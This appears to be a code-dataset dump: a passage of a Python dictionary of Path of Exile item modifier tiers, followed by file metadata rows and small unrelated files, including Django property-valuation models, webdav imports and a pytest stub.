"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(100, '(3 - 4)% increased Attack Speed')],
"#% increased Burning Damage": [(35, '(14 - 18)% increased Burning Damage'), (70, '(19 - 23)% increased Burning Damage'), (500, '(24 - 28)% increased Burning Damage\nIgnites you inflict deal Damage (15 - 20)% faster')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nProjectiles Pierce an additional Target')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Non-Ailment Chaos Damage over Time Multiplier": [(45, '(9 - 10) to Non-Ailment Chaos Damage over Time Multiplier'), (90, '(11 - 12) to Non-Ailment Chaos Damage over Time Multiplier'), (500, '(13 - 15) to Non-Ailment Chaos Damage over Time Multiplier')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Always Freezes Enemies on Hit": [(20, 'Always Freezes Enemies on Hit'), (40, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(8 - 10)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
}
| 220.770753
| 1,087
| 0.645777
| 76,920
| 513,292
| 4.309308
| 0.007098
| 0.035523
| 0.012013
| 0.02075
| 0.977639
| 0.957622
| 0.936924
| 0.917547
| 0.901234
| 0.890854
| 0
| 0.112626
| 0.17222
| 513,292
| 2,325
| 1,088
| 220.770753
| 0.667505
| 0
| 0
| 0.733333
| 1
| 0.194409
| 0.811924
| 0.00089
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
b98b03fb17df4bed1e7e97e20f60429c52a2b94d
| 98
|
py
|
Python
|
mycloud/webdav/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 4
|
2019-11-28T22:10:43.000Z
|
2022-01-23T15:18:26.000Z
|
mycloud/webdav/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 18
|
2019-01-20T22:30:48.000Z
|
2020-06-09T21:16:07.000Z
|
mycloud/webdav/__init__.py
|
thomasgassmann/mycloud-cli
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | null | null | null |
from mycloud.webdav.server import WebdavServer
from mycloud.webdav.client import MyCloudDavClient
| 32.666667
| 50
| 0.877551
| 12
| 98
| 7.166667
| 0.666667
| 0.255814
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 51
| 49
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9bec5ac4506d778655e31a9683c8b5c4a7cda87
| 3,713
|
py
|
Python
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 1
|
2017-07-24T16:47:57.000Z
|
2017-07-24T16:47:57.000Z
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 4
|
2017-05-10T15:34:23.000Z
|
2017-09-06T10:37:26.000Z
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 2
|
2019-08-29T11:52:17.000Z
|
2021-04-10T19:54:35.000Z
|
from django.db import models
class Property(models.Model):
assessment_reference = models.CharField(
max_length=32, blank=True, null=True)
uarn = models.CharField(unique=True, max_length=100)
ba_code = models.CharField(max_length=255, blank=True, null=True)
ba_name = models.CharField(max_length=255, blank=True, null=True)
ba_reference_number = models.CharField(max_length=255, unique=True)
firm_name = models.CharField(max_length=255, blank=True, null=True)
number_or_name = models.CharField(max_length=255, blank=True, null=True)
sub_street_1 = models.CharField(max_length=255, blank=True, null=True)
sub_street_2 = models.CharField(max_length=255, blank=True, null=True)
sub_street_3 = models.CharField(max_length=255, blank=True, null=True)
street = models.CharField(max_length=255, blank=True, null=True)
town = models.CharField(max_length=255, blank=True, null=True)
postal_district = models.CharField(max_length=255, blank=True, null=True)
county = models.CharField(max_length=255, blank=True, null=True)
postcode = models.CharField(max_length=255, blank=True, null=True)
scheme_ref = models.CharField(max_length=255, blank=True, null=True)
primary_description = models.CharField(
max_length=255, blank=True, null=True)
total_area = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
subtotal = models.DecimalField(max_digits=16, decimal_places=2, null=True)
total_value = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adopted_rv = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
list_year = models.IntegerField(null=True)
vo_ref = models.CharField(max_length=255, blank=True, null=True)
from_date = models.CharField(max_length=255, blank=True, null=True)
to_date = models.CharField(max_length=255, blank=True, null=True)
scat_code_only = models.CharField(max_length=255, blank=True, null=True)
unit_of_measurement = models.CharField(
max_length=255, blank=True, null=True)
unadjusted_price = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adjustement_total_before = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adjustement_total = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
class Area(models.Model):
area_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True, related_name='areas')
floor = models.CharField(max_length=255, blank=True, null=True)
description = models.CharField(max_length=255, blank=True, null=True)
area = models.DecimalField(max_digits=16, decimal_places=2, null=True)
price = models.DecimalField(max_digits=16, decimal_places=2, null=True)
value = models.DecimalField(max_digits=16, decimal_places=2, null=True)
class Adjustment(models.Model):
adjustment_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True,
related_name='adjustments')
description = models.CharField(max_length=255, blank=True, null=True)
percent = models.DecimalField(max_digits=16, decimal_places=2, null=True)
class Additional(models.Model):
additional_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True,
related_name='additionals')
other_oa_description = models.CharField(
max_length=255, blank=True, null=True)
size = models.DecimalField(max_digits=16, decimal_places=2, null=True)
price = models.DecimalField(max_digits=16, decimal_places=2, null=True)
value = models.DecimalField(max_digits=16, decimal_places=2, null=True)
| 50.863014
| 78
| 0.740102
| 515
| 3,713
| 5.141748
| 0.159223
| 0.126888
| 0.16994
| 0.226586
| 0.813822
| 0.803625
| 0.803625
| 0.803625
| 0.803625
| 0.654079
| 0
| 0.038547
| 0.14759
| 3,713
| 72
| 79
| 51.569444
| 0.798104
| 0
| 0
| 0.265625
| 0
| 0
| 0.007272
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015625
| 0
| 0.765625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b9e66d6c56e6eb5dcc48503e790b45e3d825f9e8
| 43
|
py
|
Python
|
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | 1
|
2020-06-16T05:53:24.000Z
|
2020-06-16T05:53:24.000Z
|
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | null | null | null |
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | null | null | null |
import pytest
def test_first():
pass
| 7.166667
| 17
| 0.674419
| 6
| 43
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 43
| 5
| 18
| 8.6
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
e0029ff51289cfefb26b1e154d37761f38fa1d5a
| 226
|
py
|
Python
|
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | 1
|
2021-02-09T04:39:05.000Z
|
2021-02-09T04:39:05.000Z
|
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | null | null | null |
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | 1
|
2021-02-09T03:58:46.000Z
|
2021-02-09T03:58:46.000Z
|
